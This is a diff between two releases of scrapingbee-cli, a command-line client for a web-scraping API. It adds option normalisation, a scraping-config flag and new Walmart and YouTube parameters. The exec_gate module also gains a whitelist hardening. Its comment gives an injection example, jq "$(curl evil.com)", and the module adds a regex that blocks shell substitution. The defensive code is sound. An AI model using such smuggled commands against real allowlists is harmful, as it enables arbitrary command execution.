scrapingbee-cli 1.3.0__tar.gz → 1.3.1__tar.gz
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- {scrapingbee_cli-1.3.0/src/scrapingbee_cli.egg-info → scrapingbee_cli-1.3.1}/PKG-INFO +5 -2
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/README.md +4 -1
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/pyproject.toml +1 -1
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/__init__.py +1 -1
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/cli_utils.py +19 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/client.py +8 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/amazon.py +2 -1
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/crawl.py +10 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/google.py +2 -1
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/scrape.py +8 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/walmart.py +19 -3
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/youtube.py +9 -4
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/exec_gate.py +50 -5
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1/src/scrapingbee_cli.egg-info}/PKG-INFO +5 -2
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/LICENSE +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/setup.cfg +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/audit.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/batch.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/cli.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/__init__.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/auth.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/chatgpt.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/export.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/fast_search.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/schedule.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/unsafe.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/commands/usage.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/config.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/crawl.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli/credits.py +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/SOURCES.txt +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/dependency_links.txt +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/entry_points.txt +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/requires.txt +0 -0
- {scrapingbee_cli-1.3.0 → scrapingbee_cli-1.3.1}/src/scrapingbee_cli.egg-info/top_level.txt +0 -0
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
Metadata-Version: 2.4
|
|
2
2
|
Name: scrapingbee-cli
|
|
3
|
-
Version: 1.3.
|
|
3
|
+
Version: 1.3.1
|
|
4
4
|
Summary: Command-line client for the ScrapingBee API: scrape pages (single or batch), crawl sites, check usage/credits, and use Google Search, Fast Search, Amazon, Walmart, YouTube, and ChatGPT from the terminal.
|
|
5
5
|
Author: ScrapingBee
|
|
6
6
|
License-Expression: MIT
|
|
@@ -81,7 +81,9 @@ scrapingbee [command] [arguments] [options]
|
|
|
81
81
|
- **`scrapingbee --help`** – List all commands.
|
|
82
82
|
- **`scrapingbee [command] --help`** – Options and parameters for that command.
|
|
83
83
|
|
|
84
|
-
**Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
|
|
84
|
+
**Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, `--scraping-config`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
|
|
85
|
+
|
|
86
|
+
**Parameter values:** Choice parameters accept both hyphens and underscores interchangeably (e.g. `--sort-by price-low` and `--sort-by price_low` both work).
|
|
85
87
|
|
|
86
88
|
### Commands
|
|
87
89
|
|
|
@@ -117,6 +119,7 @@ scrapingbee [command] [arguments] [options]
|
|
|
117
119
|
- **Scheduling:** `scrapingbee schedule --every 1d --name prices scrape --input-file products.csv --update-csv` registers a cron job. Use `--list`, `--stop NAME`, or `--stop all`.
|
|
118
120
|
- **Deduplication & sampling:** `--deduplicate` removes duplicate URLs; `--sample 100` processes only 100 random items.
|
|
119
121
|
- **RAG chunking:** `scrape --chunk-size 500 --chunk-overlap 50 --return-page-markdown true` outputs NDJSON chunks ready for vector DB ingestion.
|
|
122
|
+
- **Scraping configurations:** `--scraping-config "My-Config"` applies a pre-saved configuration from your ScrapingBee dashboard. Inline options override config settings. Create configurations in the [request builder](https://app.scrapingbee.com/).
|
|
120
123
|
|
|
121
124
|
### Examples
|
|
122
125
|
|
|
@@ -44,7 +44,9 @@ scrapingbee [command] [arguments] [options]
|
|
|
44
44
|
- **`scrapingbee --help`** – List all commands.
|
|
45
45
|
- **`scrapingbee [command] --help`** – Options and parameters for that command.
|
|
46
46
|
|
|
47
|
-
**Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
|
|
47
|
+
**Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, `--scraping-config`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
|
|
48
|
+
|
|
49
|
+
**Parameter values:** Choice parameters accept both hyphens and underscores interchangeably (e.g. `--sort-by price-low` and `--sort-by price_low` both work).
|
|
48
50
|
|
|
49
51
|
### Commands
|
|
50
52
|
|
|
@@ -80,6 +82,7 @@ scrapingbee [command] [arguments] [options]
|
|
|
80
82
|
- **Scheduling:** `scrapingbee schedule --every 1d --name prices scrape --input-file products.csv --update-csv` registers a cron job. Use `--list`, `--stop NAME`, or `--stop all`.
|
|
81
83
|
- **Deduplication & sampling:** `--deduplicate` removes duplicate URLs; `--sample 100` processes only 100 random items.
|
|
82
84
|
- **RAG chunking:** `scrape --chunk-size 500 --chunk-overlap 50 --return-page-markdown true` outputs NDJSON chunks ready for vector DB ingestion.
|
|
85
|
+
- **Scraping configurations:** `--scraping-config "My-Config"` applies a pre-saved configuration from your ScrapingBee dashboard. Inline options override config settings. Create configurations in the [request builder](https://app.scrapingbee.com/).
|
|
83
86
|
|
|
84
87
|
### Examples
|
|
85
88
|
|
|
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
|
|
|
4
4
|
|
|
5
5
|
[project]
|
|
6
6
|
name = "scrapingbee-cli"
|
|
7
|
-
version = "1.3.
|
|
7
|
+
version = "1.3.1"
|
|
8
8
|
description = "Command-line client for the ScrapingBee API: scrape pages (single or batch), crawl sites, check usage/credits, and use Google Search, Fast Search, Amazon, Walmart, YouTube, and ChatGPT from the terminal."
|
|
9
9
|
readme = "README.md"
|
|
10
10
|
license = "MIT"
|
|
@@ -9,6 +9,23 @@ from typing import Any
|
|
|
9
9
|
import click
|
|
10
10
|
|
|
11
11
|
|
|
12
|
+
class NormalizedChoice(click.Choice):
|
|
13
|
+
"""Choice type that accepts both hyphens and underscores.
|
|
14
|
+
|
|
15
|
+
Automatically converts underscores to hyphens before validation,
|
|
16
|
+
allowing users to use either format interchangeably.
|
|
17
|
+
Example: both --sort-by price-low and --sort-by price_low work.
|
|
18
|
+
"""
|
|
19
|
+
|
|
20
|
+
def convert(self, value: str, param: Any, ctx: Any) -> str:
|
|
21
|
+
"""Convert underscores to hyphens before validation."""
|
|
22
|
+
if value is not None:
|
|
23
|
+
normalized = value.replace("_", "-")
|
|
24
|
+
else:
|
|
25
|
+
normalized = value
|
|
26
|
+
return super().convert(normalized, param, ctx)
|
|
27
|
+
|
|
28
|
+
|
|
12
29
|
def _output_options(f: Any) -> Any:
|
|
13
30
|
"""Output + Retry options (for commands without batch support)."""
|
|
14
31
|
f = click.option(
|
|
@@ -385,6 +402,7 @@ def build_scrape_kwargs(
|
|
|
385
402
|
custom_google: str | None = None,
|
|
386
403
|
transparent_status_code: str | None = None,
|
|
387
404
|
body: str | None = None,
|
|
405
|
+
scraping_config: str | None = None,
|
|
388
406
|
) -> dict[str, Any]:
|
|
389
407
|
"""Build kwargs for Client.scrape() from scrape command options.
|
|
390
408
|
Single source of parse_bool for bool-like opts."""
|
|
@@ -424,6 +442,7 @@ def build_scrape_kwargs(
|
|
|
424
442
|
"custom_google": parse_bool(custom_google),
|
|
425
443
|
"transparent_status_code": parse_bool(transparent_status_code),
|
|
426
444
|
"body": body,
|
|
445
|
+
"scraping_config": scraping_config,
|
|
427
446
|
}
|
|
428
447
|
|
|
429
448
|
|
|
@@ -177,6 +177,7 @@ class Client:
|
|
|
177
177
|
custom_google: bool | None = None,
|
|
178
178
|
transparent_status_code: bool | None = None,
|
|
179
179
|
body: str | None = None,
|
|
180
|
+
scraping_config: str | None = None,
|
|
180
181
|
retries: int = 3,
|
|
181
182
|
backoff: float = 2.0,
|
|
182
183
|
**kwargs: Any,
|
|
@@ -217,6 +218,7 @@ class Client:
|
|
|
217
218
|
("device", device),
|
|
218
219
|
("custom_google", self._bool(custom_google)),
|
|
219
220
|
("transparent_status_code", self._bool(transparent_status_code)),
|
|
221
|
+
("scraping_config", scraping_config),
|
|
220
222
|
]:
|
|
221
223
|
if v is not None:
|
|
222
224
|
params[k] = str(v) if not isinstance(v, str) else v
|
|
@@ -415,6 +417,7 @@ class Client:
|
|
|
415
417
|
async def walmart_search(
|
|
416
418
|
self,
|
|
417
419
|
query: str,
|
|
420
|
+
start_page: int | None = None,
|
|
418
421
|
min_price: int | None = None,
|
|
419
422
|
max_price: int | None = None,
|
|
420
423
|
sort_by: str | None = None,
|
|
@@ -432,6 +435,7 @@ class Client:
|
|
|
432
435
|
) -> tuple[bytes, dict, int]:
|
|
433
436
|
params = {
|
|
434
437
|
"query": query,
|
|
438
|
+
"start_page": start_page if start_page is not None else None,
|
|
435
439
|
"min_price": min_price if min_price is not None else None,
|
|
436
440
|
"max_price": max_price if max_price is not None else None,
|
|
437
441
|
"sort_by": sort_by,
|
|
@@ -455,6 +459,7 @@ class Client:
|
|
|
455
459
|
async def walmart_product(
|
|
456
460
|
self,
|
|
457
461
|
product_id: str,
|
|
462
|
+
device: str | None = None,
|
|
458
463
|
domain: str | None = None,
|
|
459
464
|
delivery_zip: str | None = None,
|
|
460
465
|
store_id: str | None = None,
|
|
@@ -466,6 +471,7 @@ class Client:
|
|
|
466
471
|
) -> tuple[bytes, dict, int]:
|
|
467
472
|
params = {
|
|
468
473
|
"product_id": product_id,
|
|
474
|
+
"device": device,
|
|
469
475
|
"domain": domain,
|
|
470
476
|
"delivery_zip": delivery_zip,
|
|
471
477
|
"store_id": store_id,
|
|
@@ -497,6 +503,7 @@ class Client:
|
|
|
497
503
|
hdr: bool | None = None,
|
|
498
504
|
location: bool | None = None,
|
|
499
505
|
vr180: bool | None = None,
|
|
506
|
+
purchased: bool | None = None,
|
|
500
507
|
retries: int = 3,
|
|
501
508
|
backoff: float = 2.0,
|
|
502
509
|
) -> tuple[bytes, dict, int]:
|
|
@@ -516,6 +523,7 @@ class Client:
|
|
|
516
523
|
"hdr": self._bool(hdr),
|
|
517
524
|
"location": self._bool(location),
|
|
518
525
|
"vr180": self._bool(vr180),
|
|
526
|
+
"purchased": self._bool(purchased),
|
|
519
527
|
}
|
|
520
528
|
return await self._get_with_retry(
|
|
521
529
|
"/youtube/search",
|
|
@@ -17,6 +17,7 @@ from ..batch import (
|
|
|
17
17
|
)
|
|
18
18
|
from ..cli_utils import (
|
|
19
19
|
DEVICE_DESKTOP_MOBILE_TABLET,
|
|
20
|
+
NormalizedChoice,
|
|
20
21
|
_batch_options,
|
|
21
22
|
_validate_page,
|
|
22
23
|
check_api_response,
|
|
@@ -191,7 +192,7 @@ def amazon_product_cmd(
|
|
|
191
192
|
@optgroup.option("--pages", type=int, default=None, help="Number of pages to fetch.")
|
|
192
193
|
@optgroup.option(
|
|
193
194
|
"--sort-by",
|
|
194
|
-
type=
|
|
195
|
+
type=NormalizedChoice(AMAZON_SORT_BY, case_sensitive=False),
|
|
195
196
|
default=None,
|
|
196
197
|
help="Sort order.",
|
|
197
198
|
)
|
|
@@ -59,6 +59,7 @@ def _crawl_build_params(
|
|
|
59
59
|
device: str | None,
|
|
60
60
|
custom_google: str | None,
|
|
61
61
|
transparent_status_code: str | None,
|
|
62
|
+
scraping_config: str | None = None,
|
|
62
63
|
) -> dict[str, str]:
|
|
63
64
|
"""Build ScrapingBee API params dict from crawl options (quick-crawl URL mode)."""
|
|
64
65
|
kwargs = build_scrape_kwargs(
|
|
@@ -97,6 +98,7 @@ def _crawl_build_params(
|
|
|
97
98
|
custom_google=custom_google,
|
|
98
99
|
transparent_status_code=transparent_status_code,
|
|
99
100
|
body=None,
|
|
101
|
+
scraping_config=scraping_config,
|
|
100
102
|
)
|
|
101
103
|
return scrape_kwargs_to_api_params(kwargs)
|
|
102
104
|
|
|
@@ -117,6 +119,12 @@ def _crawl_build_params(
|
|
|
117
119
|
default=None,
|
|
118
120
|
help="Path to Scrapy project. Spider mode only.",
|
|
119
121
|
)
|
|
122
|
+
@click.option(
|
|
123
|
+
"--scraping-config",
|
|
124
|
+
type=str,
|
|
125
|
+
default=None,
|
|
126
|
+
help="Apply a pre-saved scraping configuration by name. Create configs in the ScrapingBee dashboard. Inline options override config settings.",
|
|
127
|
+
)
|
|
120
128
|
@optgroup.group("Rendering", help="JavaScript rendering and viewport options")
|
|
121
129
|
@optgroup.option(
|
|
122
130
|
"--render-js",
|
|
@@ -323,6 +331,7 @@ def crawl_cmd(
|
|
|
323
331
|
target: tuple[str, ...],
|
|
324
332
|
from_sitemap: str | None,
|
|
325
333
|
project: str | None,
|
|
334
|
+
scraping_config: str | None,
|
|
326
335
|
render_js: str | None,
|
|
327
336
|
js_scenario: str | None,
|
|
328
337
|
wait: int | None,
|
|
@@ -467,6 +476,7 @@ def crawl_cmd(
|
|
|
467
476
|
device=device,
|
|
468
477
|
custom_google=custom_google,
|
|
469
478
|
transparent_status_code=transparent_status_code,
|
|
479
|
+
scraping_config=scraping_config,
|
|
470
480
|
)
|
|
471
481
|
except ValueError as e:
|
|
472
482
|
click.echo(str(e), err=True)
|
|
@@ -17,6 +17,7 @@ from ..batch import (
|
|
|
17
17
|
)
|
|
18
18
|
from ..cli_utils import (
|
|
19
19
|
DEVICE_DESKTOP_MOBILE,
|
|
20
|
+
NormalizedChoice,
|
|
20
21
|
_batch_options,
|
|
21
22
|
_validate_page,
|
|
22
23
|
check_api_response,
|
|
@@ -56,7 +57,7 @@ def _warn_empty_organic(data: bytes, search_type: str | None) -> None:
|
|
|
56
57
|
@optgroup.group("Search", help="Search type, locale, and pagination")
|
|
57
58
|
@optgroup.option(
|
|
58
59
|
"--search-type",
|
|
59
|
-
type=
|
|
60
|
+
type=NormalizedChoice(
|
|
60
61
|
["classic", "news", "maps", "lens", "shopping", "images", "ai-mode"],
|
|
61
62
|
case_sensitive=False,
|
|
62
63
|
),
|
|
@@ -84,6 +84,12 @@ SCRAPE_PRESETS = (
|
|
|
84
84
|
default=None,
|
|
85
85
|
help="Apply a predefined set of options. Preset only sets options you did not set. See --help for list.",
|
|
86
86
|
)
|
|
87
|
+
@click.option(
|
|
88
|
+
"--scraping-config",
|
|
89
|
+
type=str,
|
|
90
|
+
default=None,
|
|
91
|
+
help="Apply a pre-saved scraping configuration by name. Create configs in the ScrapingBee dashboard. Inline options override config settings.",
|
|
92
|
+
)
|
|
87
93
|
@click.option(
|
|
88
94
|
"--force-extension",
|
|
89
95
|
type=str,
|
|
@@ -308,6 +314,7 @@ def scrape_cmd(
|
|
|
308
314
|
obj: dict,
|
|
309
315
|
url: str | None,
|
|
310
316
|
preset: str | None,
|
|
317
|
+
scraping_config: str | None,
|
|
311
318
|
force_extension: str | None,
|
|
312
319
|
render_js: str | None,
|
|
313
320
|
js_scenario: str | None,
|
|
@@ -467,6 +474,7 @@ def scrape_cmd(
|
|
|
467
474
|
custom_google=custom_google,
|
|
468
475
|
transparent_status_code=transparent_status_code,
|
|
469
476
|
body=body,
|
|
477
|
+
scraping_config=scraping_config,
|
|
470
478
|
)
|
|
471
479
|
except ValueError as e:
|
|
472
480
|
click.echo(str(e), err=True)
|
|
@@ -17,7 +17,9 @@ from ..batch import (
|
|
|
17
17
|
)
|
|
18
18
|
from ..cli_utils import (
|
|
19
19
|
DEVICE_DESKTOP_MOBILE_TABLET,
|
|
20
|
+
NormalizedChoice,
|
|
20
21
|
_batch_options,
|
|
22
|
+
_validate_page,
|
|
21
23
|
_validate_price_range,
|
|
22
24
|
check_api_response,
|
|
23
25
|
norm_val,
|
|
@@ -34,12 +36,13 @@ WALMART_SORT_BY = ["best-match", "price-low", "price-high", "best-seller"]
|
|
|
34
36
|
|
|
35
37
|
@click.command("walmart-search")
|
|
36
38
|
@click.argument("query", required=False)
|
|
37
|
-
@optgroup.group("
|
|
39
|
+
@optgroup.group("Pagination & filters", help="Pages, price, and sort")
|
|
40
|
+
@optgroup.option("--start-page", type=int, default=None, help="Starting page number.")
|
|
38
41
|
@optgroup.option("--min-price", type=int, default=None, help="Minimum price filter (integer).")
|
|
39
42
|
@optgroup.option("--max-price", type=int, default=None, help="Maximum price filter (integer).")
|
|
40
43
|
@optgroup.option(
|
|
41
44
|
"--sort-by",
|
|
42
|
-
type=
|
|
45
|
+
type=NormalizedChoice(WALMART_SORT_BY, case_sensitive=False),
|
|
43
46
|
default=None,
|
|
44
47
|
help="Sort order.",
|
|
45
48
|
)
|
|
@@ -74,6 +77,7 @@ WALMART_SORT_BY = ["best-match", "price-low", "price-high", "best-seller"]
|
|
|
74
77
|
def walmart_search_cmd(
|
|
75
78
|
obj: dict,
|
|
76
79
|
query: str | None,
|
|
80
|
+
start_page: int | None,
|
|
77
81
|
min_price: int | None,
|
|
78
82
|
max_price: int | None,
|
|
79
83
|
sort_by: str | None,
|
|
@@ -96,6 +100,7 @@ def walmart_search_cmd(
|
|
|
96
100
|
except ValueError as e:
|
|
97
101
|
click.echo(str(e), err=True)
|
|
98
102
|
raise SystemExit(1)
|
|
103
|
+
_validate_page(start_page, "start_page")
|
|
99
104
|
_validate_price_range(min_price, max_price)
|
|
100
105
|
|
|
101
106
|
if input_file:
|
|
@@ -123,6 +128,7 @@ def walmart_search_cmd(
|
|
|
123
128
|
async def api_call(client, q):
|
|
124
129
|
return await client.walmart_search(
|
|
125
130
|
q,
|
|
131
|
+
start_page=start_page,
|
|
126
132
|
min_price=min_price,
|
|
127
133
|
max_price=max_price,
|
|
128
134
|
sort_by=norm_val(sort_by),
|
|
@@ -165,6 +171,7 @@ def walmart_search_cmd(
|
|
|
165
171
|
async with Client(key, BASE_URL) as client:
|
|
166
172
|
data, headers, status_code = await client.walmart_search(
|
|
167
173
|
query,
|
|
174
|
+
start_page=start_page,
|
|
168
175
|
min_price=min_price,
|
|
169
176
|
max_price=max_price,
|
|
170
177
|
sort_by=norm_val(sort_by),
|
|
@@ -200,7 +207,13 @@ def walmart_search_cmd(
|
|
|
200
207
|
|
|
201
208
|
@click.command("walmart-product")
|
|
202
209
|
@click.argument("product_id", required=False)
|
|
203
|
-
@optgroup.group("
|
|
210
|
+
@optgroup.group("Device & locale", help="Device, domain, and delivery location")
|
|
211
|
+
@optgroup.option(
|
|
212
|
+
"--device",
|
|
213
|
+
type=click.Choice(DEVICE_DESKTOP_MOBILE_TABLET, case_sensitive=False),
|
|
214
|
+
default=None,
|
|
215
|
+
help="Device: desktop, mobile, or tablet.",
|
|
216
|
+
)
|
|
204
217
|
@optgroup.option("--domain", type=str, default=None, help="Walmart domain.")
|
|
205
218
|
@optgroup.option("--delivery-zip", type=str, default=None, help="Delivery ZIP code.")
|
|
206
219
|
@optgroup.option("--store-id", type=str, default=None, help="Walmart store ID.")
|
|
@@ -213,6 +226,7 @@ def walmart_search_cmd(
|
|
|
213
226
|
def walmart_product_cmd(
|
|
214
227
|
obj: dict,
|
|
215
228
|
product_id: str | None,
|
|
229
|
+
device: str | None,
|
|
216
230
|
domain: str | None,
|
|
217
231
|
delivery_zip: str | None,
|
|
218
232
|
store_id: str | None,
|
|
@@ -255,6 +269,7 @@ def walmart_product_cmd(
|
|
|
255
269
|
async def api_call(client, pid):
|
|
256
270
|
return await client.walmart_product(
|
|
257
271
|
pid,
|
|
272
|
+
device=device,
|
|
258
273
|
domain=domain,
|
|
259
274
|
delivery_zip=delivery_zip,
|
|
260
275
|
store_id=store_id,
|
|
@@ -291,6 +306,7 @@ def walmart_product_cmd(
|
|
|
291
306
|
async with Client(key, BASE_URL) as client:
|
|
292
307
|
data, headers, status_code = await client.walmart_product(
|
|
293
308
|
product_id,
|
|
309
|
+
device=device,
|
|
294
310
|
domain=domain,
|
|
295
311
|
delivery_zip=delivery_zip,
|
|
296
312
|
store_id=store_id,
|
|
@@ -17,6 +17,7 @@ from ..batch import (
|
|
|
17
17
|
validate_batch_run,
|
|
18
18
|
)
|
|
19
19
|
from ..cli_utils import (
|
|
20
|
+
NormalizedChoice,
|
|
20
21
|
_batch_options,
|
|
21
22
|
check_api_response,
|
|
22
23
|
norm_val,
|
|
@@ -117,26 +118,26 @@ YOUTUBE_SORT_BY = ["relevance", "rating", "view-count", "upload-date"]
|
|
|
117
118
|
@optgroup.group("Filters", help="Upload date, type, duration, sort")
|
|
118
119
|
@optgroup.option(
|
|
119
120
|
"--upload-date",
|
|
120
|
-
type=
|
|
121
|
+
type=NormalizedChoice(YOUTUBE_UPLOAD_DATE, case_sensitive=False),
|
|
121
122
|
default=None,
|
|
122
123
|
help="Filter by upload date.",
|
|
123
124
|
)
|
|
124
125
|
@optgroup.option(
|
|
125
126
|
"--type",
|
|
126
127
|
"type_",
|
|
127
|
-
type=
|
|
128
|
+
type=NormalizedChoice(YOUTUBE_TYPE, case_sensitive=False),
|
|
128
129
|
default=None,
|
|
129
130
|
help="Result type.",
|
|
130
131
|
)
|
|
131
132
|
@optgroup.option(
|
|
132
133
|
"--duration",
|
|
133
|
-
type=
|
|
134
|
+
type=NormalizedChoice(YOUTUBE_DURATION, case_sensitive=False),
|
|
134
135
|
default=None,
|
|
135
136
|
help="Duration: short (<4 min), medium (4-20 min), long (>20 min).",
|
|
136
137
|
)
|
|
137
138
|
@optgroup.option(
|
|
138
139
|
"--sort-by",
|
|
139
|
-
type=
|
|
140
|
+
type=NormalizedChoice(YOUTUBE_SORT_BY, case_sensitive=False),
|
|
140
141
|
default=None,
|
|
141
142
|
help="Sort order.",
|
|
142
143
|
)
|
|
@@ -153,6 +154,7 @@ YOUTUBE_SORT_BY = ["relevance", "rating", "view-count", "upload-date"]
|
|
|
153
154
|
@optgroup.option("--hdr", type=str, default=None, help="HDR videos only (true/false).")
|
|
154
155
|
@optgroup.option("--location", type=str, default=None, help="With location (true/false).")
|
|
155
156
|
@optgroup.option("--vr180", type=str, default=None, help="VR180 only (true/false).")
|
|
157
|
+
@optgroup.option("--purchased", type=str, default=None, help="Purchased only (true/false).")
|
|
156
158
|
@_batch_options
|
|
157
159
|
@click.pass_obj
|
|
158
160
|
def youtube_search_cmd(
|
|
@@ -172,6 +174,7 @@ def youtube_search_cmd(
|
|
|
172
174
|
hdr: str | None,
|
|
173
175
|
location: str | None,
|
|
174
176
|
vr180: str | None,
|
|
177
|
+
purchased: str | None,
|
|
175
178
|
**kwargs,
|
|
176
179
|
) -> None:
|
|
177
180
|
"""Search YouTube videos."""
|
|
@@ -223,6 +226,7 @@ def youtube_search_cmd(
|
|
|
223
226
|
hdr=parse_bool(hdr),
|
|
224
227
|
location=parse_bool(location),
|
|
225
228
|
vr180=parse_bool(vr180),
|
|
229
|
+
purchased=parse_bool(purchased),
|
|
226
230
|
retries=obj.get("retries", 3) or 3,
|
|
227
231
|
backoff=obj.get("backoff", 2.0) or 2.0,
|
|
228
232
|
)
|
|
@@ -268,6 +272,7 @@ def youtube_search_cmd(
|
|
|
268
272
|
hdr=parse_bool(hdr),
|
|
269
273
|
location=parse_bool(location),
|
|
270
274
|
vr180=parse_bool(vr180),
|
|
275
|
+
purchased=parse_bool(purchased),
|
|
271
276
|
retries=obj.get("retries", 3) or 3,
|
|
272
277
|
backoff=obj.get("backoff", 2.0) or 2.0,
|
|
273
278
|
)
|
|
@@ -10,6 +10,7 @@ All three features are disabled by default. To enable, ALL of these must be true
|
|
|
10
10
|
from __future__ import annotations
|
|
11
11
|
|
|
12
12
|
import os
|
|
13
|
+
import re
|
|
13
14
|
|
|
14
15
|
import click
|
|
15
16
|
|
|
@@ -59,20 +60,64 @@ def get_whitelist() -> list[str]:
|
|
|
59
60
|
return [cmd.strip() for cmd in raw.split(",") if cmd.strip()]
|
|
60
61
|
|
|
61
62
|
|
|
62
|
-
|
|
63
|
-
|
|
64
|
-
|
|
63
|
+
# Patterns that bypass whitelist validation by executing commands
|
|
64
|
+
# inside what looks like a single whitelisted command.
|
|
65
|
+
# Example: jq "$(curl evil.com)" — one segment starting with "jq",
|
|
66
|
+
# but $() executes curl before jq even runs.
|
|
67
|
+
_SUBSTITUTION_PATTERNS = re.compile(
|
|
68
|
+
r"\$\(" # command substitution $(...)
|
|
69
|
+
r"|`" # backtick command substitution
|
|
70
|
+
r"|\$\{" # variable expansion ${...} (can embed commands)
|
|
71
|
+
r"|<\(" # process substitution <(...)
|
|
72
|
+
r"|>\(" # process substitution >(...)
|
|
73
|
+
)
|
|
74
|
+
|
|
75
|
+
|
|
76
|
+
def _split_shell_segments(cmd: str) -> list[str]:
|
|
77
|
+
"""Split a shell command on pipe and chaining operators.
|
|
78
|
+
|
|
79
|
+
Returns the individual command segments from a chain like:
|
|
80
|
+
'jq .title | head -1 && echo done' → ['jq .title', 'head -1', 'echo done']
|
|
81
|
+
"""
|
|
82
|
+
# Split on ||, &&, |, ;, &, and newlines — longest operators first
|
|
83
|
+
parts = re.split(r"\|\||&&|[|;&\n]", cmd)
|
|
84
|
+
return [p.strip() for p in parts if p.strip()]
|
|
85
|
+
|
|
86
|
+
|
|
87
|
+
def _is_single_segment_whitelisted(segment: str) -> bool:
|
|
88
|
+
"""Check if a single command segment matches the whitelist."""
|
|
65
89
|
for allowed in get_whitelist():
|
|
66
|
-
if
|
|
90
|
+
if segment.startswith(allowed):
|
|
67
91
|
return True
|
|
68
92
|
return False
|
|
69
93
|
|
|
70
94
|
|
|
95
|
+
def is_command_whitelisted(cmd: str) -> bool:
|
|
96
|
+
"""Check if a command is safe to execute against the whitelist.
|
|
97
|
+
|
|
98
|
+
Validates ALL segments in a piped/chained command, not just the first.
|
|
99
|
+
Also blocks command/process substitution which can bypass segment validation.
|
|
100
|
+
"""
|
|
101
|
+
cmd_stripped = cmd.strip()
|
|
102
|
+
|
|
103
|
+
# Block substitution patterns that bypass whitelist validation
|
|
104
|
+
if _SUBSTITUTION_PATTERNS.search(cmd_stripped):
|
|
105
|
+
return False
|
|
106
|
+
|
|
107
|
+
# Validate every segment in the command chain
|
|
108
|
+
